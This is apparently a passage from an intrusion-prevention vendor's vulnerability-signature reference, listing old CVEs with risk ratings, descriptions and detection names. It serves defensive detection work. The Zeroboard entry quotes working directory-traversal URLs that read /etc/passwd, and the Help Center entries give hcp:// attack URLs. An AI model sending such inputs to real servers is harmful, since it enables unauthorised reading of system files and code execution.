About this vulnerability: Windmail File Disclosure
Risk: High
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1636-5242
Platform: Windows
Software: WindMail; Generic HTTP server
Type: Misconfiguration
Description: The Windmail command line application, when operating as a part of a form-mail capable web page, can be used to send any file on the system to the attacker.
References:
CVE-2000-0242
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0242
BID-1073
http://www.securityfocus.com/bid/1073
Back to top

HTTP-Windows-Help-And-Support-Center-Hcp-Url-System-Compromise

About this vulnerability: Windows Help and Support Center allows remote attackers to execute arbitrary code
Risk: High
First detected in: sgpkg-ips-9-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Help and Support Center
Type: Malfunction
Description: The HSC (Help and Support Center) installation contains various HTML and javascript files belonging to the "My Computer" zone. Remote attackers can exploit this by tricking a victim to visit the URL "HCP://system/DVDUpgrd/dvdupgrd.htm", which initiates the Dvdupgrade action and allows attackers to run scripts in the "My Computer" zone.
Situation: HTTP_Windows-Help-And-Support-Center-Hcp-Url-System-Compromise
File-Text_Windows-Help-And-Support-Center-Hcp-Url-System-Compromise
References:
CVE-2004-0199
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0199
BID-10321
http://www.securityfocus.com/bid/10321
MS04-015
http://technet.microsoft.com/security/bulletin/MS04-015
Back to top

HTTP-Windows-Help-And-Support-Center-Hcp-Url-System-Compromise-MS04-011

About this vulnerability: Help and Support Center in Microsoft Windows validates improperly HCP URLs
Risk: High
First detected in: sgpkg-ips-418-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Help and Support Center
Type: Buffer Overflow
Description: Some versions of Microsoft Windows could allow a remote attacker to execute arbitrary code on the system due to improper validation of Help Center and Support (HCP) URLs. A remote attacker could execute arbitrary code on the victim's computer by creating a specially-crafted hcp:// URL with quotatio marks. The code is executed with the victim's privileges when the link is accessed. The attacker could exploit this vulnerability by creating a malicious Web page and hosting it on a Web site, or by sending it to a victim as an HTML e-mail.
Situation: File-Text_Windows-Help-And-Support-Center-Hcp-Url-System-Compromise-MS04-011
References:
CVE-2003-0907
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0907
BID-10119
http://www.securityfocus.com/bid/10119
OSVDB-5253
http://www.osvdb.org/5253
MS04-011
http://technet.microsoft.com/security/bulletin/MS04-011
Back to top

HTTP-Windows-Helpctr-Exe-Hcp-Url-System-Compromise

About this vulnerability: Windows Help and Support Center allows remote attackers to execute arbitrary code
Risk: High
First detected in: sgpkg-ips-9-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Help and Support Center
Type: Malfunction
Description: Help Center in Windows XP, HelpCtr.exe, allows attackers to read and execute arbitrary files. Remote attackers can exploit the vulnerability by tricking the victim to open a link pointing to "hcp://services/layout/contentonly?topic=XXX", where XXX is a URL.
Situation: HTTP_Windows-Helpctr-Exe-Hcp-Url-System-Compromise
HTTP_SHS-Windows-Helpctr-Exe-Hcp-Url-System-Compromise
References:
CVE-2004-0474
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0474
BID-9621
http://www.securityfocus.com/bid/9621
Back to top

HTTP-Windows-Media-Player-Plugin-Embed-Src-Buffer-Overflow

About this vulnerability: Windows Media Player Plug-in long SRC in HTML embed tag buffer overflow (MS06-005
Risk: High
First detected in: sgpkg-ips-60-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Windows Media Player
Type: Buffer Overflow
Description: Windows Media Player provides a plug-in to be used with web browsers for viewing content that Media Player can display. Resources requiring plug-ins can be embedded into HTML pages via a "embed" HTML tag. The Windows Media Players plug-in suffers from a vulnerability where a long SRC value in an embed tag will cause a buffer overflow and allow arbitrary code execution.
Situation: HTTP_Windows-Media-Player-Plugin-Embed-Src-Buffer-Overflow
File-Text_Windows-Media-Player-Plugin-Embed-Src-Buffer-Overflow
References:
CVE-2006-0005
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0005
BID-16644
http://www.securityfocus.com/bid/16644
MS06-006
http://technet.microsoft.com/security/bulletin/MS06-006
Back to top

HTTP-Windows-Media-Player-PNG-Processing-Integer-Overflow

About this vulnerability: Integer overflow vulnerability in the processing of PNG images in Windows Media Player
Risk: High
First detected in: sgpkg-ips-63-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Windows Media Player
Type: Buffer Overflow
Description: Windows Media Player 9 has a vulnerability in the processing of PNG images. The application uses picture's 'width' and 'height' information to calculate various buffer sizes. If the values of these parameters are large enough, it is possible that an integer overflow occurs before the buffers are allocated. This results in buffers that are too small. When data is copied into these buffers, a buffer overflow condition will occur. A remote attacker is able to exploit this vulnerability to execute arbitrary code on the victim machine.
Situation: HTTP_PNG-Image-With-Large-Height-Or-Width-Value
File-PNG_PNG-Image-With-Large-Height-Or-Width-Value
References:
CVE-2004-1244
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1244
BID-12485
http://www.securityfocus.com/bid/12485
MS05-009
http://technet.microsoft.com/security/bulletin/MS05-009
Back to top

HTTP-Winhlp32-Item-Buffer-Overflow

About this vulnerability: Buffer overflow in Item parameter of Winhlp32
Risk: High
First detected in: sgpkg-ips-7-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Buffer Overflow
Description: The WinHlp command has a buffer overflow vulnerability in the handling of Item parameter. A remote attacker can use this vulnerability to execute arbitrary code on the victim host.
Situation: HTTP_Winhlp32-Item-Buffer-Overflow
File-Text_Microsoft-Windows-Winhlp32-Item-Buffer-Overflow
References:
CVE-2002-0823
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0823
BID-4857
http://www.securityfocus.com/bid/4857
OSVDB-2991
http://www.osvdb.org/2991
Back to top

HTTP-WinZip-FileView-ActiveX-Control-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in WinZip
Risk: High
First detected in: sgpkg-ips-85-1314
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: WinZip
Type: Buffer Overflow
Description: WinZip has a stack-based buffer overflow vulnerability. A target user with a vulnerable version of the affected product can be persuaded to visit a malicious web page containing an excessively long value assigned to the FilePattern property of the FileView object. This leads to a DoS or code execution with the privileges of the currently logged in user.
Situation: HTTP_WinZip-FileView-ActiveX-Control-Buffer-Overflow
File-Text_WinZip-FileView-ActiveX-Control-Buffer-Overflow
References:
CVE-2006-5198
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5198
BID-21060
http://www.securityfocus.com/bid/21060
OSVDB-30433
http://www.osvdb.org/30433
MS06-067
http://technet.microsoft.com/security/bulletin/MS06-067
Back to top

HTTP-Word-Doc-Using-Ie

About this vulnerability: Word Document containing reference to mshtml.dll
Risk: Moderate
First detected in: sgpkg-ips-208-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Browser
Description: A reference to mshtml.dll has been detected. This can be used to make an office document download and render html code via Internet Explorer even if Internet Explorer is not the default Internet Browser. Attacker can use this to exploit IE bugs and gain remote access.
Situation: HTTP_SS-Reference-To-Ie-Rendering-Engine
Back to top

HTTP-WS-FTP-Pro-Ini-File-Weak-Encryption

About this vulnerability: WS_FTP Pro Ini File Weak Encryption
Risk: Moderate
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1636-5242
Platform: Generic
Software: WS_FTP Professional; WS_FTP Home
Type: Misconfiguration
Description: Passwords can be stored in ini files of the WS_FTP, but their encryption is weak.
References:
CVE-1999-1078
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1078
BID-547
http://www.securityfocus.com/bid/547
Back to top

HTTP-WWW-File-Share-Pro-Directory-Traversal

About this vulnerability: WWW File Share Pro allows users to create or overwrite arbitrary files on the server.
Risk: Moderate
First detected in: sgpkg-ips-9-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: WWW File Share Pro
Type: Directory Traversal
Description: WWW File Share Pro is a small HTTP server that allows users to upload and download files. The server allows remote attackers to create or overwrite arbitrary files with '../' sequences in the filename parameter of a Content-Disposition header.
Situation: HTTP_CSH-File-Name-Directory-Traversal
References:
CVE-2004-0059
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0059
Back to top

HTTP-WWWBoard-Password-Disclosure

About this vulnerability: Password-disclosure vulnerability in WWWBoard
Risk: Moderate
First detected in: sgpkg-ips-2-1102
Last changed: sgpkg-ips-1637-5242
Platform: Generic
Software: Matt Wright WWWBoard
Type: Insecure Configuration
Description: By default, WWWBoard stores the admin password into file 'passwd.txt' under the web root. A remote attacker can download the file and use a brute force attack against the password.
References:
CVE-1999-0953
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0953
BID-649
http://www.securityfocus.com/bid/649
Back to top

HTTP-Xylogics-Annex-Ping-BOF

About this vulnerability: Xylogics Annex Ping Buffer Overflow
Risk: Low
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1636-5242
Platform: Generic
Software: Xylogics Annex
Type: Buffer Overflow
Description: The Xylogics Annex terminal services ping CGI contains a buffer overflow vulnerability when handling the query parameter. This vulnerability could be exploited to cause a denial of service.
References:
CVE-1999-1070
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1070
Back to top

HTTP-Yahoo-Audio-Conferencing-ActiveX-Control-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in the Yahoo! Audio Conferencing ActiveX control
Risk: Moderate
First detected in: sgpkg-ips-70-1314
Last changed: sgpkg-ips-1400-5242
Platform: Generic
Software: Yahoo Messenger; Yahoo Chat
Type: Buffer Overflow
Description: The Yahoo! Audio Conferencing ActiveX control used in Yahoo! Messenger and Yahoo! Chat has a buffer overflow vulnerability in the handling of a long hostname parameter. A remote attacker is able to exploit this vulnerability to execute arbitrary code on the victim host.
Situation: HTTP_Yahoo-Audio-Conferencing-ActiveX-Control-Buffer-Overflow
References:
CVE-2003-1129
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1129
BID-7561
http://www.securityfocus.com/bid/7561
OSVDB-4651
http://www.osvdb.org/4651
Back to top

HTTP-Yahoo-Messenger-AudioConf-ActiveX-Control-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in the AudioConf ActiveX control component of Yahoo! Messenger
Risk: Moderate
First detected in: sgpkg-ips-104-1314
Last changed: sgpkg-ips-1555-5242
Platform: Windows
Software: Yahoo Messenger
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in the AudioConf ActiveX control component of Yahoo! Messenger. When a crafted HTML page that contains an excessively long string assignment to the Hostname property and a function call to the createAndJoinConference method is viewed by a target user, arbitrary code can be executed with the user's privileges.
Situation: HTTP_SS-Yahoo-Messenger-AudioConf-ActiveX-Control-Buffer-Overflow
References:
CVE-2007-1680
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1680
BID-23291
http://www.securityfocus.com/bid/23291
OSVDB-34319
http://www.osvdb.org/34319
Back to top

HTTP-Yahoo-Messenger-YMailAttach-ActiveX-Buffer-Overflow

About this vulnerability: Yahoo Messenger YMailAttach ActiveX buffer overflow vulnerability
Risk: High
First detected in: sgpkg-ips-90-1314
Last changed: sgpkg-ips-1400-5242
Platform: Generic
Software: Yahoo Messenger
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Yahoo! Messenger. The vulnerability is caused by improper usage of the the YMailAttach ActiveX control. A remote attacker may exploit this vulnerability to inject and execute arbitrary code on the target host in the context of the currently logged in user.
Situation: HTTP_Yahoo-Messenger-YMailAttach-ActiveX-Control-Buffer-Overflow
References:
CVE-2006-6603
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6603
BID-21607
http://www.securityfocus.com/bid/21607
Back to top

HTTP-Zeroboard-Dir-Parameter-Php-Code-Injection

About this vulnerability: Multiple scripts in Zeroboard allow arbitrary php code injection
Risk: High
First detected in: sgpkg-ips-19-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Zeroboard
Type: PHP Injection
Description: Multiple scripts in Zeroboard allow PHP source injection by defining a 'dir' parameter that points to a malicious php file. Error.php, login.php, setup.php and ask_password.php all include the file '$dir/value.php3'. A successful exploit allows remote attackers to execute arbitrary php code on the server.
Situation: HTTP_CRL-Zeroboard-Dir-Parameter-Php-Code-Injection
References:
CVE-2005-0380
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0380
BID-12206
http://www.securityfocus.com/bid/12206
OSVDB-12929
http://www.osvdb.org/12929
OSVDB-12932
http://www.osvdb.org/12932
OSVDB-12931
http://www.osvdb.org/12931
OSVDB-12930
http://www.osvdb.org/12930
OSVDB-12928
http://www.osvdb.org/12928
Back to top

HTTP-Zeroboard-Multiple-File-Disclosure

About this vulnerability: Three Zeroboard scripts show arbitrary files
Risk: Moderate
First detected in: sgpkg-ips-19-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Zeroboard
Type: Directory Traversal
Description: Head.php, include/write.php and outlogin.php in Zeroboard allow directory traversal. By accessing URLs such as "_head.php?_zb_path=../../../../../etc/passwd%00", "include/write.php?dir=../../../../../etc/passwd%00" and "outlogin.php?_zb_path=../../../../../etc/passwd%00", remote attackers can view arbitrary files on the server.
Situation: HTTP_CSU-Zeroboard-Multiple-File-Disclosure
References:
CVE-2005-0379
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0379
BID-12257
http://www.securityfocus.com/bid/12257
Back to top

HTTP-Zeroboard-Print-Category-Php-Dir-Parameter-Php-Code-Injection

About this vulnerability: Zeroboard's Print_category.php allows arbitrary php code injection
Risk: High
First detected in: sgpkg-ips-19-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Zeroboard
Type: PHP Injection
Description: Print_category.php in Zeroboard allows PHP source injection by defining a 'dir' parameter that points to a malicious php file. Print_category.php includes the file "$dir/category_head.php", and a successful exploit allows remote attackers to execute arbitrary php code on the server.
Situation: HTTP_CRL-Zeroboard-Print-Category-Php-Dir-Parameter-Php-Code-Injection
References:
CVE-2005-0380
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0380
BID-12258
http://www.securityfocus.com/bid/12258
OSVDB-12929
http://www.osvdb.org/12929
OSVDB-12932
http://www.osvdb.org/12932
OSVDB-12931
http://www.osvdb.org/12931
OSVDB-12930
http://www.osvdb.org/12930
OSVDB-12928
http://www.osvdb.org/12928
Back to top

HTTP-ZmEu-Scanner

About this vulnerability: ZmEu Scanner Attack Tool
Risk: Moderate
First detected in: sgpkg-ips-505-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ZmEu
Type: Browser
Description: ZmEu Scanner is an attack tool that is designed to exploit website-related vulnerabilities. ZmEu can be identified by HTTP User-Agent header containing "ZmEu".
Situation: HTTP_CSH-ZmEu-Scanner-Usage
Back to top

HTTP8080-RealServer-ViewSource-DoS

About this vulnerability: Denial-of-Service vulnerability in Real Networks Real Server
Risk: Moderate
First detected in: sgpkg-ips-58-1210
Last changed: sgpkg-ips-1637-5242
Platform: Generic
Software: RealNetworks Real Server
Type: Malfunction
Description: Real Networks' Real Server crashes after handling requests for a page in the 'viewsource' directory. Attacker can cause denial of service by exploiting this vulnerability.
References:
CVE-2000-0474
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0474
BID-1288
http://www.securityfocus.com/bid/1288
Back to top

HTTPDX-HTTP-Server-1.4-Stack-Based-Buffer-Overflow

About this vulnerability: HTTPDX HTTP Server 1.4 Stack Based Buffer Overflow
Risk: High
First detected in: sgpkg-ips-654-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: HTTPDX HTTP Server
Type: Buffer Overflow
Description: An stack based buffer overflow vulnerability in HTTPDX HTTP Server 1.4 which allows attackers to remotly execute arbitrary code via a long HTTP GET request.
Situation: HTTP_CSU-HTTPDX-HTTP-Server-1.4-Stack-Based-Buffer-Overflow
References:
CVE-2009-3711
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3711
OSVDB-58714
http://www.osvdb.org/58714
Back to top

HTTPDX-TOLOG-Function-Format-String

About this vulnerability: An HTTPDX TOLOG Function Format String vulnerability.
Risk: High
First detected in: sgpkg-ips-758-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows XP SP3
Software: HTTPDX HTTP Server
Type: Format String
Description: Multiple vulnerabilities in HTTPDX HTTP Server, versions 1.4, 1.4.5, 1.4.6, 1.4.6b, and 1.5, which allow remote attackers to execute arbitrary code via format string specifiers in a GET request to the HTTP server component and in a PWD command to the FTP server component.
Situation: HTTP_CSU-HTTPDX-TOLOG-Function-Format-String
FTP_CS-HTTPDX-TOLOG-Function-Format-String
References:
CVE-2009-4769
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4769
OSVDB-60181
http://www.osvdb.org/60181
Back to top

Httper

About this vulnerability: HTTPER
Risk: Low
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: HTTPER
Type: Misconfiguration
Description: HTTPER is an adware. It is not a virus or a Trojan, however it is considered a potentially unwanted program.
Situation: HTTP_CSH-Httper
Back to top

HTTPS-Joost-Usage

About this vulnerability: Detects Joost usage
Risk: Low
First detected in: sgpkg-ips-109-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Joost
Type: Peer-to-Peer
Description: Detects Joost usage.
Situation: HTTPS_SS-Joost-Usage
Back to top

HTTPS-Microsoft-Schannel-Security-Package-Compromise

About this vulnerability: Remote code execution vulnerability in Microsoft Schannel Security Package
Risk: High
First detected in: sgpkg-ips-111-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows 2000;Windows XP;Windows 2003
Software: <os>
Type: Buffer Overflow
Description: Microsoft Schannel SSL client does not handle invalid SSL ServerKeyExchange messages correctly. A malicious SSL server can use a specially crafted handshake message to execute arbitrary code on vulnerable SSL clients connecting to it.
Situation: HTTPS_SS-Microsoft-Schannel-Security-Package-Compromise
References:
CVE-2007-2218
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2218
BID-24416
http://www.securityfocus.com/bid/24416
MS07-031
http://technet.microsoft.com/security/bulletin/MS07-031
Back to top

HTTP_Akamai-Download-Manager-ActiveX-Buffer-Overflow

About this vulnerability: A vulnerability in Akamai download ActiveX control
Risk: High
First detected in: sgpkg-ips-140-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Akamai Download Manager
Type: Buffer Overflow
Description: A buffer overflow vulnerability exists in Akamai Download Manager ActiveX control. A remote attacker can exploit this vulnerability by enticing the target user to open a malicious webpage, potentially allowing arbitrary code to be injected and executed in the security context of the currently logged in user.
Situation: HTTP_Akamai-Download-Manager-BOF
File-Text_Akamai-Download-Manager-BOF
References:
CVE-2007-1891
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1891
BID-23522
http://www.securityfocus.com/bid/23522
OSVDB-34323
http://www.osvdb.org/34323
Back to top

HTTP_Binary-In-User-Agent-String

About this vulnerability: Binary in User-Agent
Risk: Moderate
First detected in: sgpkg-ips-180-2032
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: <os>
Type: Code Injection
Description: The User-Agent field in a http request header is used to identify the web client application. This field is usually written in Ascii range of characters and contains often values like: "User-Agent: Mozilla/4\.0". The User-Agent field may also be used within attempts to obfuscate logs in the http server or in storing a shellcode that is used within an exlpoit attempt. Having binary in the user-agent field does not indicate that the webserver is vulnerable or compromised, but it may indicate that an attack is going on.
Situation: HTTP_CSH-ShellCode-In-User-Agent
Back to top

HTTP_Cisco-Secure-Access-Control-Server-UCP-Application-CSuserCGI.exe-BOF

About this vulnerability: A buffer overflow vulnerability in the Cisco User-Changeable Password (UCP) application
Risk: High
First detected in: sgpkg-ips-149-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Cisco Systems UCP
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in the Cisco User-Changeable Password (UCP) application. The vulnerability can be triggered by sending an HTTP GET request with an excessively long argument as the Serial string in the Logout action to the vulnerable server, causing a denial of service condition or allowing execution of arbitrary code with the privileges of the affected product.
Situation: HTTP_CRL-Cisco-Secure-Access-Control-Server-UCP-Application-CSuserCGI.exe-BOF
References:
CVE-2008-0532
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0532
BID-28222
http://www.securityfocus.com/bid/28222
OSVDB-42961
http://www.osvdb.org/42961
Back to top

HTTP_CRL-Amadey-Bot-Infection-Traffic

About this vulnerability: Amadey Bot infection traffic was detected
Risk: High
First detected in: sgpkg-ips-1276-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Amadey Bot infection traffic was detected.
Situation: HTTP_CRL-Amadey-Bot-Infection-Traffic
Back to top

HTTP_CRL-NetGear-WNR2000v5-Remote-Code-Execution-CVE-2016-10174

About this vulnerability: A vulnerability in NetGear WNR2000v5
Risk: High
First detected in: sgpkg-ips-1485-5242
Last changed: sgpkg-ips-1485-5242
Platform: Generic
Software: NetGear
Type: Buffer Overflow
Description: A buffer overflow vulnerability has been reported in the Netgear WNR2000v5 routers. A remote, unauthenticated attacker can use this vulnerability to execute arbitrary code via the hidden_lang_avi parameter.
Situation: HTTP_CRL-NetGear-WNR2000v5-Remote-Code-Execution-CVE-2016-10174
References:
CVE-2016-10174
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10174
Back to top

HTTP_CSU-Apple-Software-Update-Catalog-Filename-Format-String

About this vulnerability: Format string vulnerability in Apple Software Update Catalog
Risk: High
First detected in: sgpkg-ips-132-2032
Last changed: sgpkg-ips-1555-5242
Platform: Mac OS X
Software: <os>
Type: Format String
Description: There is a format string vulnerability in Apple Software Update, included in the Apple Mac OS X operating system. The vulnerability is due to insufficient input validation when handling filenames in the update software. The vulnerability may allow arbitrary code execution in the context of the current user.
References:
CVE-2007-0463
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0463
BID-22222
http://www.securityfocus.com/bid/22222
OSVDB-32703
http://www.osvdb.org/32703
Back to top

HTTP_CSU-RIG-EK-Traffic-Pattern

About this vulnerability: Traffic resembling RIG Exploit Kit was detected
Risk: High
First detected in: sgpkg-ips-1038-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Javascript Injection
Description: RIG Exploit Kit traffic was detected. An exploit kit is a platform, which can automatically exploit user's computer when infected website is visited.
Situation: HTTP_CSU-RIG-EK-Traffic-Pattern
Back to top

HTTP_FunWebProducts-mywebsearch

About this vulnerability: FunWebProducts mywebsearch Toolbar
Risk: Low
First detected in: sgpkg-ips-224-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Mywebsearch
Type: Misconfiguration
Description: mywebseach is an Internet Explorer toolbar that may show advertisements. Some organizations may consider the mywebsearch software unwanted.
Situation: HTTP_CSH-FunWebProducts-mywebsearch-Toolbar
Back to top

HTTP_GoAhead-Webserver-Deep-Path-Buffer-Overflow

About this vulnerability: A buffer overflow vulnerability in GoAhead Webserver allows remote code execution
Risk: High
First detected in: sgpkg-ips-139-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: GoAhead Webserver
Type: Buffer Overflow
Description: A buffer overflow vulnerability exists in GoAhead Webserver 2.1. The vulnerability can be triggered by sending a GET request containing a deep path.
Situation: HTTP_CS-GoAhead-Deep-Directory-BOF
References:
CVE-2002-1951
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1951
BID-5464
http://www.securityfocus.com/bid/5464
Back to top

HTTP_HP-OpenView-Network-Node-Manager-Cgi-Application-Buffer-Overflow

About this vulnerability: A vulnerability in HP OpenView Network Node Manager
Risk: High
First detected in: sgpkg-ips-141-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP OpenView Network Node Manager
Type: Buffer Overflow
Description: There exists a buffer overflow vulnerability in HP OpenView Network Node Manager. The flaw is due to boundary error in Common Gateway Interface (CGI) applications when processing overly long parameters submitted in HTTP requests. A remote unauthenticated attacker can send a crafted HTTP request to the target host to exploit this vulnerability. Successful attack could allow for arbitrary code being injected and executed with the privileges of the affected service, which is normally the Internet Guest Account on Windows platforms.
Situation: HTTP_CSU-HP-OpenView-Network-Node-Manager-Cgi-Application-Buffer-Overflow
References:
CVE-2007-6204
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6204
BID-26741
http://www.securityfocus.com/bid/26741
Back to top

HTTP_HP-Software-Update-Tool-ActiveX-Control-File-Overwrite

About this vulnerability: A vulnerability in HP RulesEngine.dll ActiveX CTL
Risk: High
First detected in: sgpkg-ips-137-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: HP Software Update
Type: Input Validation
Description: An arbitrary file overwrite vulnerability exists in the HP Software Update, shipped with many HP systems. The vulnerability is due to a design weakness in an ActiveX component that is used to download patches and updates for the HP software. A remote attacker may persuade the target user to open a malicious web page to overwrite sensitive files on the local system's file system and potentially corrupt the operating system, and/or execute arbitrary code on the vulnerable system with privileges of logged in user.
Situation: HTTP_HP-Software-Update-Tool-ActiveX-Control-File-Overwrite
File-Text_HP-Software-Update-Tool-ActiveX-Control-File-Overwrite
References:
CVE-2007-6506
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6506
BID-26950
http://www.securityfocus.com/bid/26950
Back to top

HTTP_IBM-Access-Support-ActiveX-Getxmlvalue-Method-Buffer-Overflow

About this vulnerability: Stack-based buffer overflow vulnerability in IBM Access Support ActiveX control
Risk: Moderate
First detected in: sgpkg-ips-216-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: IBM Access Support ActiveX Control
Type: Buffer Overflow
Description: There is a stack-based buffer overflow vulnerability in the IBM Access Support ActiveX control. The vulnerability is due to insufficient input validation in the GetXMLValue() method of the IBM Access Support ActiveX control. A remote attacker can exploit this vulnerability by enticing the user to open a crafted HTML file. In an attack where code injection is successful, the behavior of the target is entirely dependent on the intended function of the injected code. The code is executed in the security context of the logged in user. In an attack where code injection is not successful, Internet Explorer terminates abnormally.
Situation: HTTP_SS-IBM-Access-Support-ActiveX-Getxmlvalue-Method-Buffer-Overflow
File-Text_IBM-Access-Support-ActiveX-Getxmlvalue-Method-Buffer-Overflow
References:
CVE-2009-0215
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0215
BID-34228
http://www.securityfocus.com/bid/34228
OSVDB-52958
http://www.osvdb.org/52958
Back to top

HTTP_IIS-Exair-DoS

About this vulnerability: IIS ExAir sample page Denial of Service
Risk: Moderate
First detected in: sgpkg-ips-7-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: IIS 4.0
Type: Insecure Configuration
Description: The IIS ExAir sample pages contain a denial of service vulnerability that can be exploited if these sample pages are available on the Web server. IIS hangs if the related ExAir DLLs are not running when one of the following sample pages is requested: root/search/advsearch.asp, root/search/query.asp or root/search/search.asp.
Situation: HTTP_CRL-IIS-Exair-DoS
References:
CVE-1999-0449
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0449
BID-193
http://www.securityfocus.com/bid/193
OSVDB-4
http://www.osvdb.org/4
OSVDB-3
http://www.osvdb.org/3
OSVDB-2
http://www.osvdb.org/2
Back to top

HTTP_Internet-Explorer-Imjpcksid.dll-Com-Object-Memory-Corruption

About this vulnerability: Memory corruption vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-97-1314
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: There is a memory corruption vulnerability in Microsoft Internet Explorer. The flaw is due to improper handling of certain COM objects that are not designed to work with Internet Explorer. By persuading a user to visit a malicious web site, a remote attacker may execute arbitrary code on the target system with the privileges of the currently logged in user.
Situation: HTTP_Internet-Explorer-Imjpcksid.dll-Com-Object-Memory-Corruption
File-Text_Internet-Explorer-Imjpcksid.dll-Com-Object-Memory-Corruption
References:
CVE-2006-4697
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4697
BID-22486
http://www.securityfocus.com/bid/22486
OSVDB-31891
http://www.osvdb.org/31891
MS07-016
http://technet.microsoft.com/security/bulletin/MS07-016
Back to top

HTTP_Internet-Explorer-Multiple-Com-Objects-Instantiation-Memory-Corruption

About this vulnerability: Memory corruption vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-97-1314
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: There is a vulnerability in the way Microsoft Internet Explorer instantiates certain COM objects that are not designed to be used as ActiveX controls. When instantiation of such COM objects is attempted by Internet Explorer, the application memory can be corrupted as a result. Successful exploitation of this vulnerability can allow for arbitrary code execution within the security context of the currently logged in user.
Situation: HTTP_SS-Internet-Explorer-Multiple-Com-Objects-Instantiation-Memory-Corruption
File-Text_Internet-Explorer-Multiple-Com-Objects-Instantiation-Memory-Corruption
References:
CVE-2007-0219
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0219
BID-22504
http://www.securityfocus.com/bid/22504
OSVDB-31895
http://www.osvdb.org/31895
OSVDB-31894
http://www.osvdb.org/31894
OSVDB-31893
http://www.osvdb.org/31893
MS07-016
http://technet.microsoft.com/security/bulletin/MS07-016
Back to top

HTTP_Macrovision-InstallShield-Update-Service-Isusweb.dll-Remote-Buffer-Overflow

About this vulnerability: A vulnerability in Macrovision Update Service
Risk: High
First detected in: sgpkg-ips-138-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Macrovision Update Service; Macrovision FLEXnet Connect; Macrovision InstallShield
Type: Buffer Overflow
